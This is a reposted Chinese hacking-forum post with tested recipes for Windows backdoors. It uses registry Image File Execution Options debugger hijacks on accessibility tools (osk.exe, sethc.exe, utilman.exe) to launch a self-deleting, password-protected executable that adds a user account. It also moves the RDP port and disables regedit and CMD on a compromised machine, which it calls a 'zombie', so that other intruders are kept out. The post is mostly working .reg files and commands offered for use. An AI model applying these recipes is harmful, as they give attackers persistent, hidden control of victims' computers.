发新话题
打印

[转载]注册表及组策略后门实测手记

[转载]注册表及组策略后门实测手记

信息来源:邪恶八进制信息安全团队(www.eviloctal.com
实测后记录下。有兴趣的结合一下,也许能从中得到后门的放置技巧
安静导入regedit /s *.reg

方法一、取消粘滞键 REG导入 sethc.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys]
"Flags"="506"
[HKEY_USERS\.DEFAULT\Control Panel\Accessibility\StickyKeys]
"Flags"="506"
注册表导入后,注销后生效。也就是将原值510改为506
方法二、开始→控制面板→辅助功能选项-键盘-粘滞键-设置-取消勾选“使用快捷键”复选框
高对比度:左侧 ALT + 左侧 SHIFT + PRINT SCREEN。
鼠标键:左侧 ALT + 左侧 SHIFT + NUM LOCK
这两个仍可调用sethc.exe作后门使用了。我们总不能与其它人用一样的shift 5次吧,其实调用的都是同一个东西

C:\WINDOWS\system32\utilman.exe (辅助工具管理器)WIN+U 调用
C:\WINDOWS\system32\osk.exe (屏幕键盘)
C:\WINDOWS\system32\magnify.exe (放大镜) 注:这几个都是可利用的

映像方法
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe]
"debugger"="c:\WINDOWS\\System32\\wbem\ysjy.exe"
sethc.exe配合映像方法的使用效果更好

综合以上我们可以作出如下后门
将 VBS加用户的脚本(http://bbs.77169.com/mainframe.php?tid=225157&fid=161),制作成带密码的自解压ysjy.exe。
优点如下:
1、运行时VBS带参数后//B,防止重复加用户时,出现不必要的对话窗口。
2、注意使用后自动删除,自解压能实现。哈哈脚本加密必尽是可逆的
3、不管是他将sethc.exe替换成什么后门都不影响、自己的后门使用。哈哈我朋友就碰到过,怎么换都不行
4、可以在cmd禁用的条件下使用,防止他人使用cmd。
5、带个密码总是安全不少,且自己用rar工具破解自解压是不成功的。实测。
6、shift 5次不能调出,与众不同了。调用方法见上

下面的代码是,保护自己的成果。。其实自己很少保护自己的成果
3380远程端口修改 3380.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp]
"PortNumber"=dword:00000d34
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000d34
有必要改一下远程的端口,有很多人还是喜欢入侵前。先看一下3389有无shift后门。

注册表禁用与恢复
禁用
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001   //注册表恢复导入是行不通的。
恢复
gpedit.msc -用户配置-->管理模板-->系统 右面有个 -阻止访问注册表编辑工具-禁用
右键---新建--快捷方式----
在弹出的窗口“请键入项目的位置”输入栏里输入以下某例即可达到相干功能
%WinDir%\System32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t

REG_DWORD /d 0 /f   (解注册表)
禁用注册表对肉鸡来说安全性提高不少,以上代码都是实测过的。网上的不见得行的通

禁用CMD
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
"DisableCMD"=dword:00000001 //00000000恢复
右键---新建--快捷方式----
在弹出的窗口“请键入项目的位置”输入栏里输入以下某例即可达到相干功能 其实不用注册表在rar里的附加参数就能修改注册表
%WinDir%\System32\reg.exe add HKCU\Software\Policies\Microsoft\Windows\System   DisableCMD /t REG_DWORD /d 0 /f
禁用CMD对其它入侵者来说提权难度高了不少。
select girl from Guilin where age='18-20' and bg='beautiful'--

TOP

发新话题